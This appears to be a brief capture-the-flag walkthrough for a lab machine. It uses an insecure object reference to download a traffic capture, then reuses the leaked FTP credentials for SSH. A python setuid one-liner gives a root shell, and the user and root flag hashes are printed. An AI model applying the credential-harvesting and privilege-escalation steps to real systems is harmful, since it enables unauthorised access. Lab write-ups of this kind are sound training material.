Accessing the web page we can see this web page http://10.10.10.245/data/4. By default it set us to the number 4 or file 4. We can change the request to 0 and download a .pcap file containing all network traffic where we can capture the username and password for nathan.

USER nathan

PASS Buck3tH4TF0RM3!

ssh as nathan

nathan:Buck3tH4TF0RM3!

user.txt - 43a60c707e9ee55d3c1c067366cfdc97

running linpeas we can see we have python suid/capabilities and looking at gtfo bins we can exploit this.

navigate to /usr/bin

./python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

 

We are root

root.txt - 7ecaf1f3cf53a5de0e4ba676e2693e3a